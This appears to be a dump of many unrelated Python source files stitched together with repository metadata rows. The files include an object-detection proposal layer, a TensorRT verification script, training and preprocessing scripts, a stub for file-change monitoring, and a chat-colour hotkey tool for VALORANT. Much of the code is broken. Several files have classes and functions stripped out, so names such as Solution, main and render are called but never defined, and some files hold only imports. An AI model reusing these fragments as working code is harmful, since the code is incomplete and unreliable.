] | null | null | null | lib_drl/layer_utils/proposal_layer.py | chang010453/GRP-HAI | 60f7c7633e33dbdd852f5df3e0a3d1017b6b2a22 | [
"MIT"
] | null | null | null | # --------------------------------------------------------
# Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from model.config import cfg
from model.bbox_transform import bbox_transform_inv, clip_boxes
from model.nms_wrapper import nms
def proposal_layer(rpn_cls_prob, rpn_bbox_pred, im_info, cfg_key, _feat_stride,
anchors):
"""A simplified version compared to fast/er RCNN
For details please see the technical report
"""
if type(cfg_key) == bytes:
cfg_key = cfg_key.decode('utf-8')
pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N
post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N
nms_thresh = cfg[cfg_key].RPN_NMS_THRESH
# Get the scores and bounding boxes
scores = rpn_cls_prob[:, :, :, cfg.NBR_ANCHORS:]
rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))
scores = scores.reshape((-1, 1))
proposals = bbox_transform_inv(anchors, rpn_bbox_pred)
proposals = clip_boxes(proposals, im_info[:2])
# Pick the top region proposals
order = scores.ravel().argsort()[::-1]
if pre_nms_topN > 0:
order = order[:pre_nms_topN]
proposals = proposals[order, :]
scores = scores[order]
# Non-maximal suppression
keep = nms(np.hstack((proposals, scores)), nms_thresh)
# Pick th top region proposals after NMS
if post_nms_topN > 0:
keep = keep[:post_nms_topN]
proposals = proposals[keep, :]
scores = scores[keep]
# Only support single image as input
batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)
blob = np.hstack((batch_inds, proposals.astype(np.float32, copy=False)))
return blob, scores
def proposal_layer_all(rpn_bbox_pred, im_info, anchors):
"""
Simply returns every single RoI; GRP-HAI later decides
which are forwarded to the class-specific module.
"""
# Get the bounding boxes
batch_sz, height, width = rpn_bbox_pred.shape[0: 3]
rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))
proposals = bbox_transform_inv(anchors, rpn_bbox_pred)
proposals = clip_boxes(proposals, im_info[:2])
# Create initial (all-zeros) observation RoI volume
roi_obs_vol = np.zeros((batch_sz, height, width, cfg.NBR_ANCHORS),
dtype=np.int32)
not_keep_ids = np.zeros((1, 1), dtype=np.int32)
# Only support single image as input
batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)
rois_all = np.hstack((batch_inds, proposals.astype(np.float32, copy=False)))
return rois_all, roi_obs_vol, not_keep_ids | 35.455696 | 80 | 0.670118 |
1145f38136a9b2f21e2507449a336cde84624ed4 | 14,999 | py | Python | tools/verification/trt_verify.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | tools/verification/trt_verify.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | tools/verification/trt_verify.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import os
import time
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
import cv2
import mmcv
from tqdm import tqdm
import pickle as pkl
from vis_util import show_corners
from tools.model_zoo import model_zoo as zoo
TRT_LOGGER = trt.Logger()
# Simple helper data class that's a little nicer to use than a 2-tuple.
# Allocates all buffers required for an engine, i.e. host/device inputs/outputs.
def allocate_buffers(engine):
inputs = []
outputs = []
output_names = []
bindings = []
stream = cuda.Stream()
for binding in engine:
size = trt.volume(
engine.get_binding_shape(binding)) * engine.max_batch_size
dtype = trt.nptype(engine.get_binding_dtype(binding))
print('binding:{}, size:{}, dtype:{}'.format(binding, size, dtype))
# Allocate host and device buffers
host_mem = cuda.pagelocked_empty(size, dtype)
device_mem = cuda.mem_alloc(host_mem.nbytes)
# Append the device buffer to device bindings.
bindings.append(int(device_mem))
# Append to the appropriate list.
if engine.binding_is_input(binding):
inputs.append(HostDeviceMem(host_mem, device_mem))
else:
outputs.append(HostDeviceMem(host_mem, device_mem))
output_names.append(binding)
return inputs, outputs, output_names, bindings, stream
# This function is generalized for multiple inputs/outputs.
# inputs and outputs are expected to be lists of HostDeviceMem objects.
def get_engine(onnx_file_path, engine_file_path=""):
"""Attempts to load a serialized engine if available, otherwise builds a new TensorRT engine and saves it."""
def build_engine(builder):
"""Takes an ONNX file and creates a TensorRT engine to run inference with"""
with builder.create_network() as network, trt.OnnxParser(
network, TRT_LOGGER) as parser:
builder.max_workspace_size = 1 << 27 # 1GB
builder.max_batch_size = 1
print('max workspace size: {:.2f} MB'.format(
builder.max_workspace_size / 1024 / 1024))
tic = time.time()
# Parse model file
if not os.path.exists(onnx_file_path):
print('ONNX file {} not found, please generate it.'.format(
onnx_file_path))
exit(0)
print('Loading ONNX file from path {}...'.format(onnx_file_path))
with open(onnx_file_path, 'rb') as model:
print('Beginning ONNX file parsing')
parser.parse(model.read())
print('Completed parsing of ONNX file')
print('Building an engine from file {}; this may take a while...'.
format(onnx_file_path))
engine = builder.build_cuda_engine(network)
if engine is None:
raise Exception('build engine failed')
else:
print('Completed! time cost: {:.1f}s'.format(time.time() -
tic))
with open(engine_file_path, "wb") as f:
f.write(engine.serialize())
return engine
with trt.Builder(TRT_LOGGER) as builder:
if builder.platform_has_fast_fp16:
print('enable fp16 mode!')
builder.fp16_mode = True
builder.strict_type_constraints = True
engine_file_path = engine_file_path.replace('.trt', '_fp16.trt')
if os.path.exists(engine_file_path):
# If a serialized engine exists, use it instead of building an engine.
print("Reading engine from file {}".format(engine_file_path))
with open(engine_file_path,
"rb") as f, trt.Runtime(TRT_LOGGER) as runtime:
return runtime.deserialize_cuda_engine(f.read())
else:
return build_engine(builder)
# Output shapes expected by the post-processor
version = 'v5.5.2'
if 'cm' in version:
num_fg = 12
else:
num_fg = 7
topk = 50
input_h, input_w = (800, 1280)
out_channels = 64
pool_scale = 4
output_h = int(input_h / pool_scale)
output_w = int(input_w / pool_scale)
onnx_files = {
'v4_fp16':
'/private/ningqingqun/torch/centernet/r34_fp16_epoch_16_iter_60000.onnx',
'v5.1.16':
'/private/ningqingqun/mmdet/outputs/v5.1.16/centernet_r18_ignore_1017_1915_gpu12/epoch_35_iter_3675.onnx',
'v5.tmp':
'work_dirs/debug/centernet_r18_ignore_1105_1118_desktop/epoch_1_iter_500.onnx',
'cm-v0.1':
'work_dirs/debug/centernet_r18_no_1119_1954_desktop/epoch_35_iter_4305.onnx',
'cm-v0.2':
'work_dirs/debug/centernet_r18_no_1120_1157_desktop/epoch_40_iter_4920.onnx',
'cm-v0.6':
'/private/ningqingqun/mmdet/outputs/no31_36/centernet_r18_adam_no_crop_1129_1920_gpu9/epoch_10_iter_2000.onnx',
'cm-v0.8':
'/work/work_dirs/v5.3.3/centernet_r18_finetune_large_1207_1707_desktop/epoch_20_iter_1160.onnx'
}
name2shape = {
'heatmap': (1, num_fg, output_h, output_w),
'height_feats': (1, 3, output_h, output_w),
'reg_xoffset': (1, 3, output_h, output_w),
'reg_yoffset': (1, 3, output_h, output_w),
'pose': (1, output_h, output_w),
'raw_features': (1, output_h, output_w, out_channels),
'heatmap_indexs': (1, topk),
'wh_feats': (1, 2, output_h, output_w),
'reg_offset': (1, 2, output_h, output_w),
}
def main():
"""Create a TensorRT engine for ONNX-based centernet and run inference."""
try:
cuda.init()
major, minor = cuda.Device(0).compute_capability()
except:
raise Exception("failed to get gpu compute capability")
onnx_file_path = zoo[version]['model_file'].replace('.pth', '.onnx')
new_ext = '-{}.{}.trt'.format(major, minor)
engine_file_path = onnx_file_path.replace('.onnx', new_ext)
# engine_file_path ='/private/ningqingqun/torch/centernet/vision_detector_fabu_v4.0.0-5.1.5.0-6.1.trt'
# Download a dog image and save it to the following file path:
image_list = get_images()
out_dir = '/private/ningqingqun/results/trt_results/' + version + '_20191220_mining'
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
# Do inference with TensorRT
trt_outputs = []
with get_engine(onnx_file_path, engine_file_path
) as engine, engine.create_execution_context() as context:
inputs, outputs, output_names, bindings, stream = allocate_buffers(
engine)
# Do inference
# print('Running inference on image {}...'.format(input_image_path))
# Set host input to the image.
# The common.do_inference function will copy the input to the GPU
# before executing.
for input_image_path in tqdm(image_list):
# input_h, input_w = (input_h // 32 * 32, input_w // 32 * 32)
im = cv2.imread(input_image_path)
resized_image = cv2.resize(im, (input_w, input_h))
input_image = preprocess(resized_image)
inputs[0].host = input_image
# tic = time.time()
trt_outputs = do_inference(
context,
bindings=bindings,
inputs=inputs,
outputs=outputs,
stream=stream)
# print('inference time cost: {:.1f}ms'.format(
# (time.time() - tic) * 1000))
# Before doing post-processing, we need to reshape the outputs as the common.do_inference will give us flat arrays.
trt_outputs = [
output.reshape(name2shape[name])
for output, name in zip(trt_outputs, output_names)
]
class_names = [
'car', 'bus', 'truck', 'person', 'bicycle', 'tricycle', 'block'
]
out_file = os.path.join(out_dir,
os.path.basename(input_image_path))
if 'v5' in version:
show_results_3d(resized_image.copy(), trt_outputs, out_file,
class_names)
elif 'cm' in version:
class_names = [
'right20',
'right40',
'right45',
'left20',
'left40',
'left45',
'NO31',
'NO32',
'NO33',
'NO34',
'NO35',
'NO36',
]
show_results_2d(resized_image.copy(), trt_outputs, out_file,
class_names)
else:
show_results_2d(resized_image.copy(), trt_outputs, out_file,
class_names)
if __name__ == '__main__':
main()
| 37.876263 | 151 | 0.626775 |
1146252ac942d4c9ff4deece36ba6f7c91187e06 | 1,741 | py | Python | Main.py | 0ne0rZer0/Mon-T-Python | c263ed540d811a8bc238b859f03a52cc1151779c | [
"MIT"
] | null | null | null | Main.py | 0ne0rZer0/Mon-T-Python | c263ed540d811a8bc238b859f03a52cc1151779c | [
"MIT"
] | null | null | null | Main.py | 0ne0rZer0/Mon-T-Python | c263ed540d811a8bc238b859f03a52cc1151779c | [
"MIT"
] | null | null | null | import os, time, sys, hashlib
# Python Recreation of MonitorSauraus Rex.
# Originally Developed by Luke Barlow, Dayan Patel, Rob Shire, Sian Skiggs.
# Aims:
# - Detect Rapid File Changes
# - Cut Wifi Connections
# - Create Logs for running processes at time of trigger, find source infection file.
# - Create "Nest" Safe folder , with encryption and new file types. ".egg" type?
# - Create Notification for a user/admin? Connect to a database?
# - kill running processes in aim to kill attack.
# Getting MD5 Hash of a string:
# print (hashlib.md5("Your String".encode('utf-8')).hexdigest())
origHashList = []
# Getting MD5 Hash of a file:
# Shows Correct Hash Changes Upon File Alteration.
# Prints The Collected Hashes.
# Main Method
main()
#Use checksumdir python package available for calculating checksum/hash of directory. It's available at https://pypi.python.org/pypi/checksumdir/1.0.5
#Usage :
#import checksumdir
#hash = checksumdir.dirhash("c:\\temp")
#print hash
| 27.634921 | 151 | 0.66054 |
1148006841dace7c2d15cf681638c79c776c650b | 270 | py | Python | pytext/data/sources/__init__.py | shruti-bh/pytext | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | [
"BSD-3-Clause"
] | 1 | 2020-10-20T09:14:15.000Z | 2020-10-20T09:14:15.000Z | pytext/data/sources/__init__.py | shruti-bh/pytext | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | [
"BSD-3-Clause"
] | null | null | null | pytext/data/sources/__init__.py | shruti-bh/pytext | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .data_source import DataSchema, DataSchemaConfig, DataSource
from .tsv import TSVDataSource
__all__ = ["DataSchema", "DataSchemaConfig", "DataSource", "TSVDataSource"]
| 30 | 75 | 0.774074 |
1148e9602cf3ea5d501cac86ca50ffbe359518e0 | 4,444 | py | Python | src/Competition/4.25.com3.py | Peefy/PeefyLeetCode | 92156e4b48ba19e3f02e4286b9f733e9769a1dee | [
"Apache-2.0"
] | 2 | 2018-05-03T07:50:03.000Z | 2018-06-17T04:32:13.000Z | src/Competition/4.25.com3.py | Peefy/PeefyLeetCode | 92156e4b48ba19e3f02e4286b9f733e9769a1dee | [
"Apache-2.0"
] | null | null | null | src/Competition/4.25.com3.py | Peefy/PeefyLeetCode | 92156e4b48ba19e3f02e4286b9f733e9769a1dee | [
"Apache-2.0"
] | 3 | 2018-11-09T14:18:11.000Z | 2021-11-17T15:23:52.000Z |
import math
if __name__ == "__main__":
solution = Solution()
print(solution.minimalSteps(["S#O", "M..", "M.T"]))
print(solution.minimalSteps(["S#O", "M.#", "M.T"]))
print(solution.minimalSteps(["S#O", "M.T", "M.."]))
| 37.982906 | 108 | 0.464446 |
11499a7441906f3bce3d215812d969fa784411f0 | 3,836 | py | Python | coinextAPI.py | R-Mascarenhas/CryptoTrade | 491a7a2e562694312843fbc58a003904d3d97000 | [
"Apache-2.0"
] | 1 | 2021-05-28T15:31:53.000Z | 2021-05-28T15:31:53.000Z | coinextAPI.py | R-Mascarenhas/CryptoTrade | 491a7a2e562694312843fbc58a003904d3d97000 | [
"Apache-2.0"
] | null | null | null | coinextAPI.py | R-Mascarenhas/CryptoTrade | 491a7a2e562694312843fbc58a003904d3d97000 | [
"Apache-2.0"
] | null | null | null | import requests
import json
from datetime import date, datetime, timedelta | 36.188679 | 124 | 0.618352 |
11499dc46efd3a0f04d31a58e295c03134ec2637 | 469 | py | Python | example/soft_spi_example.py | amaork/raspi-io | aaea4532569010a64f3c54036b9db7eb81515d1a | [
"MIT"
] | 8 | 2018-02-28T16:02:36.000Z | 2021-08-06T12:57:39.000Z | example/soft_spi_example.py | amaork/raspi-io | aaea4532569010a64f3c54036b9db7eb81515d1a | [
"MIT"
] | null | null | null | example/soft_spi_example.py | amaork/raspi-io | aaea4532569010a64f3c54036b9db7eb81515d1a | [
"MIT"
] | 1 | 2019-05-08T06:50:33.000Z | 2019-05-08T06:50:33.000Z | from raspi_io import SoftSPI, GPIO
import raspi_io.utility as utility
if __name__ == "__main__":
address = utility.scan_server(0.05)[0]
cpld = SoftSPI(address, GPIO.BCM, cs=7, clk=11, mosi=10, miso=9, bits_per_word=10)
flash = SoftSPI(address, GPIO.BCM, cs=8, clk=11, mosi=10, miso=9, bits_per_word=8)
cpld.write([0x0])
cpld.write([0x10])
cpld.write([0x30])
cpld.write([0x80])
data = flash.xfer([0x9f], 3)
flash.print_binary(data)
| 31.266667 | 86 | 0.66951 |
114a920b441f7acbb102aa82afab60cd9f2a194e | 2,527 | py | Python | video/train_vqvae_lstm.py | arash-safari/vp | 377e0172112157b79690b32349481a17e7590063 | [
"MIT"
] | null | null | null | video/train_vqvae_lstm.py | arash-safari/vp | 377e0172112157b79690b32349481a17e7590063 | [
"MIT"
] | null | null | null | video/train_vqvae_lstm.py | arash-safari/vp | 377e0172112157b79690b32349481a17e7590063 | [
"MIT"
] | null | null | null | from torch import nn, optim
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import torch
| 35.591549 | 117 | 0.550455 |
114baac9b0ba0fd601c9c440b172f038a36ec799 | 307 | py | Python | Curso_de_Python_3_do_Basico_Ao_Avancado_Udemy/aula069/zip_e_zip_longest.py | DanilooSilva/Cursos_de_Python | 8f167a4c6e16f01601e23b6f107578aa1454472d | [
"MIT"
] | null | null | null | Curso_de_Python_3_do_Basico_Ao_Avancado_Udemy/aula069/zip_e_zip_longest.py | DanilooSilva/Cursos_de_Python | 8f167a4c6e16f01601e23b6f107578aa1454472d | [
"MIT"
] | null | null | null | Curso_de_Python_3_do_Basico_Ao_Avancado_Udemy/aula069/zip_e_zip_longest.py | DanilooSilva/Cursos_de_Python | 8f167a4c6e16f01601e23b6f107578aa1454472d | [
"MIT"
] | null | null | null | """
Zip - Unindo iterveis
Zip_longest _ Itertools
"""
from itertools import zip_longest, count
index = count()
cidades = ['Sao Paulo', 'Belo Horizonte', 'Salvador', 'Monte Belo']
estados = ['SP', 'MG', 'BA']
cidades_estados = zip_longest(cidades, estados)
for valor in cidades_estados:
print(valor) | 20.466667 | 67 | 0.70684 |
114bfce52e4cd09b2cceb92b610dc1db5f94447b | 7,087 | py | Python | VoiceAssistant/speechrecognition/neuralnet/train.py | Reyansh0667/A-Programmer-AI-Voice-Assistant | 7350050515fe333627c9c27b17d1e98d99b8a5c2 | [
"MIT"
] | 575 | 2020-05-29T07:31:40.000Z | 2022-03-31T16:06:48.000Z | VoiceAssistant/speechrecognition/neuralnet/train.py | Reyansh0667/A-Programmer-AI-Voice-Assistant | 7350050515fe333627c9c27b17d1e98d99b8a5c2 | [
"MIT"
] | 67 | 2020-08-05T16:17:28.000Z | 2022-03-12T09:04:33.000Z | VoiceAssistant/speechrecognition/neuralnet/train.py | Reyansh0667/A-Programmer-AI-Voice-Assistant | 7350050515fe333627c9c27b17d1e98d99b8a5c2 | [
"MIT"
] | 259 | 2020-05-30T15:04:59.000Z | 2022-03-30T02:56:03.000Z | import os
import ast
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning import Trainer
from argparse import ArgumentParser
from model import SpeechRecognition
from dataset import Data, collate_fn_padd
from pytorch_lightning.loggers import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint
if __name__ == "__main__":
parser = ArgumentParser()
# distributed training setup
parser.add_argument('-n', '--nodes', default=1, type=int, help='number of data loading workers')
parser.add_argument('-g', '--gpus', default=1, type=int, help='number of gpus per node')
parser.add_argument('-w', '--data_workers', default=0, type=int,
help='n data loading workers, default 0 = main process only')
parser.add_argument('-db', '--dist_backend', default='ddp', type=str,
help='which distributed backend to use. defaul ddp')
# train and valid
parser.add_argument('--train_file', default=None, required=True, type=str,
help='json file to load training data')
parser.add_argument('--valid_file', default=None, required=True, type=str,
help='json file to load testing data')
parser.add_argument('--valid_every', default=1000, required=False, type=int,
help='valid after every N iteration')
# dir and path for models and logs
parser.add_argument('--save_model_path', default=None, required=True, type=str,
help='path to save model')
parser.add_argument('--load_model_from', default=None, required=False, type=str,
help='path to load a pretrain model to continue training')
parser.add_argument('--resume_from_checkpoint', default=None, required=False, type=str,
help='check path to resume from')
parser.add_argument('--logdir', default='tb_logs', required=False, type=str,
help='path to save logs')
# general
parser.add_argument('--epochs', default=10, type=int, help='number of total epochs to run')
parser.add_argument('--batch_size', default=64, type=int, help='size of batch')
parser.add_argument('--learning_rate', default=1e-3, type=float, help='learning rate')
parser.add_argument('--pct_start', default=0.3, type=float, help='percentage of growth phase in one cycle')
parser.add_argument('--div_factor', default=100, type=int, help='div factor for one cycle')
parser.add_argument("--hparams_override", default="{}", type=str, required=False,
help='override the hyper parameters, should be in form of dict. ie. {"attention_layers": 16 }')
parser.add_argument("--dparams_override", default="{}", type=str, required=False,
help='override the data parameters, should be in form of dict. ie. {"sample_rate": 8000 }')
args = parser.parse_args()
args.hparams_override = ast.literal_eval(args.hparams_override)
args.dparams_override = ast.literal_eval(args.dparams_override)
if args.save_model_path:
if not os.path.isdir(os.path.dirname(args.save_model_path)):
raise Exception("the directory for path {} does not exist".format(args.save_model_path))
main(args) | 43.478528 | 111 | 0.658389 |
114f19bb66b60d61b441f7697a5eae83b5d30c4e | 596 | py | Python | DRL/models/oct/18-argon/session1/reward.py | EXYNOS-999/AWS_JPL_DRL | ea9df7f293058b0ca2dc63753e68182fcc5380f5 | [
"Apache-2.0"
] | null | null | null | DRL/models/oct/18-argon/session1/reward.py | EXYNOS-999/AWS_JPL_DRL | ea9df7f293058b0ca2dc63753e68182fcc5380f5 | [
"Apache-2.0"
] | 1 | 2020-01-08T06:52:03.000Z | 2020-01-08T07:05:44.000Z | DRL/models/oct/18-argon/session1a/reward.py | EXYNOS-999/AWS_JPL_DRL | ea9df7f293058b0ca2dc63753e68182fcc5380f5 | [
"Apache-2.0"
] | null | null | null | """
AWS DeepRacer reward function using only progress
"""
#===============================================================================
#
# REWARD
#
#===============================================================================
| 27.090909 | 80 | 0.458054 |
114fdc8df483131a51698126243a63c5be6a6a0e | 579 | py | Python | djcelery_model/tests/testapp/tasks.py | idanshimon/django-celery-model | 0127bdf7a30ca97a2f0054413c7892477bd03d2f | [
"MIT"
] | null | null | null | djcelery_model/tests/testapp/tasks.py | idanshimon/django-celery-model | 0127bdf7a30ca97a2f0054413c7892477bd03d2f | [
"MIT"
] | 5 | 2020-07-13T17:33:29.000Z | 2020-09-11T16:21:54.000Z | djcelery_model/tests/testapp/tasks.py | idanshimon/django-celery-model | 0127bdf7a30ca97a2f0054413c7892477bd03d2f | [
"MIT"
] | 1 | 2020-12-07T13:27:02.000Z | 2020-12-07T13:27:02.000Z | from __future__ import absolute_import, unicode_literals
from hashlib import sha1
from time import sleep
from celery import shared_task
from .models import JPEGFile
| 19.3 | 56 | 0.749568 |
11534d93e39e29332cbc56c2467f77183e5bab66 | 2,028 | py | Python | tests/test_redirector.py | lawliet89/flask-redirector | 8637c2bd0025bb48db8694c83ad64825a85825a5 | [
"Apache-2.0"
] | null | null | null | tests/test_redirector.py | lawliet89/flask-redirector | 8637c2bd0025bb48db8694c83ad64825a85825a5 | [
"Apache-2.0"
] | 1 | 2016-09-27T03:23:38.000Z | 2016-09-27T03:23:38.000Z | tests/test_redirector.py | lawliet89/flask-redirector | 8637c2bd0025bb48db8694c83ad64825a85825a5 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
"""
Redirector tests
"""
from redirector import views
| 28.56338 | 97 | 0.688363 |
1157a67a471d97e9b998c20a52b64bbf93cf6c33 | 13,715 | py | Python | multipy/check.py | kamilazdybal/multipy | ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9 | [
"MIT"
] | null | null | null | multipy/check.py | kamilazdybal/multipy | ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9 | [
"MIT"
] | null | null | null | multipy/check.py | kamilazdybal/multipy | ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9 | [
"MIT"
] | null | null | null | """multipy: Python library for multicomponent mass transfer"""
__author__ = "James C. Sutherland, Kamila Zdybal"
__copyright__ = "Copyright (c) 2022, James C. Sutherland, Kamila Zdybal"
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = ["Kamila Zdybal"]
__email__ = ["kamilazdybal@gmail.com"]
__status__ = "Production"
import numpy as np
import pandas as pd
import random
import copy
import scipy
import multipy
import warnings
gas_constant = 8.31446261815324
################################################################################
################################################################################
####
#### Class: Check
####
################################################################################
################################################################################
| 38.525281 | 206 | 0.587386 |
1157f9d0f3382897cf392138bb21e63963ec687a | 1,311 | py | Python | backtesting/__init__.py | mhconradt/research-tools | b60f42bcce571665d918c1637f532a5a9f5caf4b | [
"MIT"
] | null | null | null | backtesting/__init__.py | mhconradt/research-tools | b60f42bcce571665d918c1637f532a5a9f5caf4b | [
"MIT"
] | null | null | null | backtesting/__init__.py | mhconradt/research-tools | b60f42bcce571665d918c1637f532a5a9f5caf4b | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from backtesting.analysis import plot_cost_proceeds, plot_holdings, \
plot_performance
from backtesting.report import Report
from backtesting.simulation import simulate
if __name__ == '__main__':
main()
__all__ = ['simulate', 'plot_holdings', 'plot_cost_proceeds',
'plot_performance']
| 33.615385 | 77 | 0.670481 |
11582c4c142efc6bf040a2f6c49882faa3503209 | 24,681 | py | Python | relation_extraction/data/preprocess.py | geetickachauhan/relation-extraction | aa920449b20c7127954eaaaa05244e7fc379e018 | [
"MIT"
] | 19 | 2019-06-24T18:33:36.000Z | 2022-01-21T03:16:12.000Z | relation_extraction/data/preprocess.py | geetickachauhan/relation-extraction | aa920449b20c7127954eaaaa05244e7fc379e018 | [
"MIT"
] | null | null | null | relation_extraction/data/preprocess.py | geetickachauhan/relation-extraction | aa920449b20c7127954eaaaa05244e7fc379e018 | [
"MIT"
] | 11 | 2019-06-02T08:59:16.000Z | 2021-08-23T04:31:07.000Z | '''
Author: Geeticka Chauhan
Performs pre-processing on a csv file independent of the dataset (once converters have been applied).
Refer to notebooks/Data-Preprocessing for more details. The methods are specifically used in the non
_original notebooks for all datasets.
'''
import os, pandas as pd, numpy as np
import nltk
import spacy
from spacy.tokens import Doc
# important global variables for identifying the location of entities
entity1 = 'E'
entity2 = 'EOTHER'
entity_either = 'EEITHER'
'''
The methods below are for the preprocessing type 1
'''
# separate the indexes of entity 1 and entity 2 by what is intersecting
# and what is not
# given an entity replacement dictionary like {'0:0': 'entity1'}
# provide more information related to the location of the entity
###
### Helper functions
###
#given string 12:30, return 12, 30 as a tuple of ints
# remove any additional whitespace within a line
# adapted from tag_sentence method in converter_ddi
# note that white spaces are added in the new sentence on purpose
'''
Preprocessing Type 2: Removal of stop words, punctuations and the replacement of digits
'''
# gives a dictionary signifying the location of the different entities in the sentence
# given the index information of the entities, return the sentence with
# tags ESTART EEND etc to signify the location of the entities
# preprocessing 2: remove the stop words and punctuation from the data
# and replace all digits
# TODO: might be nice to give an option to specify whether to remove the stop words or not
# this is a low priority part though
'''
Preprocessing Type 3 part 1: NER
'''
# a method to check for overlap between the ner_dict that is created
###
### Helper functions for the NER replacement
###
# for indexes that look like (1,1) and (2,2) check if the left is fully included in the right
#else there is no overlap
# taken from https://stackoverflow.com/questions/46548902/converting-elements-of-list-of-nested-lists-from-string-to-integer-in-python
# given all of these dictionaries, return the ner replacement dictionary
# this function is different from the sort_position_keys because
# we care about sorting not just by the beginning token, but also by the length that the span contains
# given a splitted sentence - make sure that the sentence is in list form
'''
Below methods do entity detection from the tagged sentences, i.e. a sentence that contains
ESTART, EEND etc, use that to detect the locations of the respective entities and remove the tags
from the sentence to return something clean
'''
# below is taken directly from the ddi converter and
# removes the first occurence of the start and end, and tells of their location
# based upon the method in converter for DDI, this will do removal of the entity tags and keep
# track of where they are located in the sentence
#TODO unify the preprocessing code with actually writing to a dataframe so that experiments can be started
# Read the original dataframe, generate the replacement sentence and then from that, you should just
# call the get_entity_positions_and_replacement_sentence
# might be good to just have one method to do this because it seems like the tasks are kinda similar
# just different methods to call for preprocessing 1 vs 2
'''
Returns the dataframe after doing the preprocessing
'''
# update the metadata and the sentence with the preprocessed version
# give this preprocessing function a method to read the dataframe, and the location of the original
# dataframe to read so that it can do the preprocessing
# whether to do type 1 vs type 2 of the preprocessing
# 1: replace with all concepts in the sentence, 2: replace the stop words, punctuations and digits
# 3: replace only punctuations and digits
| 48.680473 | 134 | 0.677485 |
115918a7f0ed81b2789ef7c2542b4e40e41471f5 | 9,868 | py | Python | SWAPLINEmain.py | ernforslab/Hu-et-al._GBMlineage2022 | 508744307746f357c75c1b1e92d9739a11d76870 | [
"BSD-3-Clause"
] | 1 | 2022-03-01T23:51:26.000Z | 2022-03-01T23:51:26.000Z | SWAPLINEmain.py | ernforslab/Hu-et-al._GBMlineage2022 | 508744307746f357c75c1b1e92d9739a11d76870 | [
"BSD-3-Clause"
] | null | null | null | SWAPLINEmain.py | ernforslab/Hu-et-al._GBMlineage2022 | 508744307746f357c75c1b1e92d9739a11d76870 | [
"BSD-3-Clause"
] | 3 | 2022-03-01T23:53:20.000Z | 2022-03-28T08:01:07.000Z | import datetime
import seaborn as sns
import pickle as pickle
from scipy.spatial.distance import cdist, pdist, squareform
import pandas as pd
from sklearn.linear_model import LogisticRegression, LogisticRegressionCV
#from sklearn.model_selection import StratifiedShuffleSplit
from collections import defaultdict
from sklearn import preprocessing
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression, LogisticRegressionCV
from sklearn.model_selection import StratifiedShuffleSplit
from collections import defaultdict
from sklearn import preprocessing
import random
import datetime
from sklearn.decomposition import PCA
import scipy
from sklearn.metrics import pairwise_distances
from scipy.sparse import issparse, coo_matrix
import sys
| 48.851485 | 138 | 0.667511 |
1159ace76695ba7ee79a54fb2dfd624cc5d70bce | 1,988 | py | Python | main.py | b0kch01/ColorfulValorant | 9fdbcc6ca4626fc3d7f0349eb7564ffac1fc26c2 | [
"MIT"
] | 1 | 2021-06-07T13:52:48.000Z | 2021-06-07T13:52:48.000Z | main.py | B0kCh01/ColorfulValorant | 9fdbcc6ca4626fc3d7f0349eb7564ffac1fc26c2 | [
"MIT"
] | 1 | 2021-09-26T10:49:16.000Z | 2021-09-27T03:27:55.000Z | main.py | b0kch01/ColorfulValorant | 9fdbcc6ca4626fc3d7f0349eb7564ffac1fc26c2 | [
"MIT"
] | null | null | null | # Colorful VALORANT by b0kch01
import os, ctypes
# Disable quick-edit mode (pauses bot)
kernel32 = ctypes.windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-10), 128)
from pyfiglet import Figlet
from termcolor import cprint, colored
import colorama
import keyboard
import time
# Fix legacy console color
colorama.init()
cprint("Setting up...")
cprint(" - [] Windows", "green")
cprint(" - [] Imported Modules", "green")
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
cprint(" - [x] Please run as administrator", "red")
input("[ ENTER ] to quit")
exit(0)
# User Interface
f = Figlet(font="ogre")
bgs = ["on_red", "on_yellow", "on_green", "on_blue", "on_magenta"]
CACHED_TITLESCREEN = f"""
{ "".join([colored(" " + "COLORFUL"[i] + " ", "grey", bgs[i % 4]) for i in range(8)]) }
{ colored(f.renderText("Valorant"), "red") }
{ colored(" Created with by b0kch01! ", "grey", "on_white") }
{ colored(" USE AT YOUR OWN RISK ", "grey", "on_yellow") }
"""
i = 0
colors = [
"<enemy>",
"<team>",
"<system>",
"<notification>",
"<warning>"
]
colorMap = [
"red",
"blue",
"yellow",
"green",
"magenta"
]
keyboard.add_hotkey("\\", makeColor)
keyboard.add_hotkey("up", goUp)
keyboard.add_hotkey("down", goDown)
try:
render()
